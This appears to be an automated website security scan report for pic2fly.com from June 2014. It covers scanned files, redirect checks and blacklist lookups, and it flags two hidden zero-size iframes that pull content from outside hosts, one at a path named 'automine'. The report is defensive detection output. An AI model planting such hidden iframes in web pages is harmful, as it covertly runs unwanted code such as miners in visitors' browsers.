Scanned pages/files
Request | Server response | Status |
http://pic2fly.com/ | 200 OK Content-Length: 16637 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 style: hidden src: http://nzbhq.com:3030/automine <iframe width="0" height="0" tabindex="-1" title="empty" style="display:none" src="http://nzbhq.com:3030/automine"> Hidden iFrame found. size: 0x0 src: http://107.6.105.91:3000/ffgff <iframe src="http://107.6.105.91:3000/ffgff" width="0" height="0"> | ||
http://www.pic2fly.com/assets/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://www.pic2fly.com/assets/js/custom.js | 200 OK Content-Length: 37248 Content-Type: application/x-javascript | clean |
http://pic2fly.com/assets/js/prettyPhoto/js/jquery.prettyPhoto.js | 200 OK Content-Length: 16856 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 166375 Content-Type: application/x-javascript | clean |
http://pic2fly.com/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pic2fly.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 23:49:13 GMT
Server: nginx/1.2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d88aa0918dc16f01daea691ea7be653b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221402184953%22%3B%7D199743c43d0eb20c4acc0f63f6383c15; expires=Sun, 08-Jun-2014 01:49:13 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d88aa0918dc16f01daea691ea7be653b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221402184953%22%3B%7D199743c43d0eb20c4acc0f63f6383c15; expires=Sun, 08-Jun-2014 01:49:13 GMT; path=/
X-Powered-By: PHP/5.4.4-14+deb7u9
GET / HTTP/1.1
Host: pic2fly.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 23:49:13 GMT
Server: nginx/1.2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d88aa0918dc16f01daea691ea7be653b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221402184953%22%3B%7D199743c43d0eb20c4acc0f63f6383c15; expires=Sun, 08-Jun-2014 01:49:13 GMT; path=/
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d88aa0918dc16f01daea691ea7be653b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2278.158.11.226%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+5.1%29%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221402184953%22%3B%7D199743c43d0eb20c4acc0f63f6383c15; expires=Sun, 08-Jun-2014 01:49:13 GMT; path=/
X-Powered-By: PHP/5.4.4-14+deb7u9
Second query (visit from search engine):
GET / HTTP/1.1
Host: pic2fly.com
Referer: http://www.google.com/search?q=pic2fly.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pic2fly.com
Referer: http://www.google.com/search?q=pic2fly.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pic2fly.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pic2fly.com/
Result: pic2fly.com is not infected or malware details are not published yet.
Result: pic2fly.com is not infected or malware details are not published yet.